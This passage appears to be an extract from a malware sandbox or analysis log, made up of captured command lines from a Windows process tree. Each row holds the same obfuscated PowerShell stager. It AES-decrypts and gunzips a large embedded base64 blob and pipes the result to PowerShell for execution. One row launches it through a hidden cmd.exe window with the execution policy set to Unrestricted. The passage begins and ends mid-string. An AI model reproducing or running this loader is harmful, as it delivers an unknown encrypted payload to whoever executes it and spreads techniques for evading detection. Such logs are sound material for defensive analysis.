kbihcMCz713ii0B4pPj+j9GwjuSYhMQPz3Gvjxe6t6kyJahYTh3MoJbLBpTmdWN4IUzXXyWmLBRXAJvN2/XPgzAkWL9GxxfjZd8iqgZVS32nKV8gvnhfVcf4zq3Hf7+OXM0t8Q7VojcuKgVZv0T9GezIQ7pGKBmh6j4LF2AQsyigPyvBWbhXVhTYXSPcAN701ZO7VAWJXn01F1knjEXcA2xIUy7yTx4X5XvY9Ic8B+WrFVnYAmeETknas0YjPJDNKgrU2ZZkDCY16AaXfB+4TVmx9EHFFSVRLFuBYUZ107thxonxzGWE8EmlGzrbg12z2s5IUOXVPZAnir8WfAYRjgTf6yXKoAZraJmEQE7yuzfMqfxYzhkWmNhTQMZ18ez3/USbDmLw4m30V1xHMW+m/GUovmPguRvO9df8eMs0NsZbVJyZ83z2tEL884DHKoIPAoPr86mPdCCW3TS3jYlZfSE2OZYrhhURmStTn4azcFWiW7vOpujNrW4WHXCwbHv65ol1pHmx7rmR0vNeK27chWrruid3JS/eoB0OoE5VVE4OIaCMi7bS0Ll5DcPbhKN/93elO8BNIhHN86dS7RLGnwyrnTHJfGh1TFpyANUEpFA+Aesef6m2wZEa6g1Qu6d67IoyStZaRB7bd1CgCrsTgfbMwJ9FIjXtYeRC2TJyxcHk9925PNj3F4Bc+A5Q4HY+SGZt3nG+2LklMKCR8IlQEcd2V//ObPJ/FWSLv5SPaQ+vQRP8t82R+O3/M2YH5sLSY6hXz22jZjhPOQ56PLx69brVCxFgFPIQruDzGCQunvzpBlp+cMMhxeZLip0CISOowibI+frniOn4VanN7nyQoiPBjKLUqKE1dGsJ8HTMMg8t7uElwm1Z8gOTkATSKAnYyK+pIZeBsbePIL4KtXj1S7dN5dSVlNhlzKsGbWPu9WdHoq1JrgD2DlT//iOdf0ILsfXJDJTlmDTADd0B2MvcrxoRNKCZMicJoznw3cWYeGUUOxqwvQZIxdnYrnGKqLt7JbSbGkfokf+ixbpQVDvzI2/cIYnJ7ZIfdwTbjuWmfBBB5tiu6t4dWXrPCuGgSsUXESsGRDhWNFTUTFLlkVfHbc4GX0TwPGvshqA8rQR6abELMA2e7ejEX+AtKSQW4dbQkTwJiLNL3uYMRKgmnHg3TIn86tYgBTuf9pnj/DIZNw2ZA6YnK3Sbxjb2Q3lz03Dtw63TMR39iBlnjroZakPQz4mggFrkN6am6DF9C0YDkAeO8GErbbZcvTLPkpvsc/vTvoNcS5OUI+kwS2Ix0N57sEf0acciB537tGSuwA/Nq95bH/UFSw1bz724Sj5s7dsQtlHiq5jnKg+G5xhs71YJUzy4Qnn76gpq11VlmxMi8ylQGjCr1Ahzi1ELO4pnarQElXZsqSIINv9nEzl5ulKp9Jbn+EtA85csbB5p7mJtACPWok9a9TpZs/ZwdNwU7oVbYga65enge4QUTldLr0KdjY/3gd186lbzNzuTqrgZXgSymli7tEN6vMTMN/YLCb1Art+uPcM0Pra/GO6yMv7V0GH01Vdbby915wN5EBgTF1qnR82oY5UKnnTov/l3pgIzLdC0lV9147qgHtHdUQPuXPPjPeGb9t2xcw0+NVEBNGg3ZSNkC71pRpm2W99nD71yMw53Lm0uiJHhcTQw9Hz7tASGMtI5R0Ey88DpK43nvQA==';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell - }
cmdline	powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell - }
cmdline	"C:\Windows\system32\cmd.exe" /c powershell.exe $YmgBp = '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